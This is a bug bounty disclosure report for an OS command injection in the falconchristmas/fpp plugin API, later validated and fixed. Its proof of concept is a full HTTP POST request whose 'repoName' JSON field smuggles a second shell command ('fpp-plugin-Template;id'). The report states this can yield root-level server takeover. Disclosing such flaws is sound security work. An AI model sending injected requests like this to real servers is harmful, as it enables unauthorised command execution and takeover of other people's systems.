OS Command Injection in falconchristmas/fpp


Reported on

Jun 26th 2021

✍️ Description

Application is reading invalidated user input at Line 44 through: $plugin = $pluginInfo['repoName'];. Line 57 in plugin.php calls system() to execute a command. This might allow an attacker to inject malicious commands.

🕵️‍♂️ Proof of Concept

SCREENSHOT: (https://drive.google.com/file/d/1hdmb6ko2myoYdLRT5HbTmQrPkh3yMeZB/view?usp=sharing)


POST /api/plugin?stream=true HTTP/1.1
Content-Length: 1077
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LIMONADE0x5x0=qt4qoj4cvklpupvoe1vmeleuf3; PHPSESSID=15kngldlq9kfg73t5js6kn3h4d
Connection: close
#added payload in "repoName" param
{"repoName":"fpp-plugin-Template;id","name":"Template Plugin for FPP Plugin developers","author":"John Doe (jdoe)","description":"This template plugin is designed to make it easier for plugin authors to create new FPP Plugins.  You can manually clone the git repository or install the Template Plugin and then go to the plugin's config page and use the form to copy the template into a new plugin directory.","homeURL":"https://github.com/FalconChristmas/fpp-plugin-Template","srcURL":"https://github.com/FalconChristmas/fpp-plugin-Template.git","bugURL":"https://github.com/FalconChristmas/fpp-plugin-Template/issues","allowUpdates":1,"versions":[{"minFPPVersion":"2.0","maxFPPVersion":"0","branch":"master","sha":"","dependencies":{"plugins":["fpp-plugin-CoolPlugin1","fpp-plugin-CoolPlugin2"],"packages":["system-package-name1","system-package-name2"],"scripts":["Control/script-repository-script1","PixelOverlay/script-repository-script2"]}}],"branch":"root","sha":"","infoURL":"https://raw.githubusercontent.com/FalconChristmas/fpp-plugin-Template/master/pluginInfo.json"}

💥 Impact

Executing command at root level leading to the complete server takeover with root privileges.


We have contacted a member of the falconchristmas/fpp team and are waiting to hear back a year ago
Greg Hormann validated this vulnerability a year ago
Akshay Jain has been awarded the disclosure bounty
The fix bounty is now up for grabs
Greg Hormann confirmed that a fix has been merged on 8bfba3 a year ago
Greg Hormann has been awarded the fix bounty
to join this conversation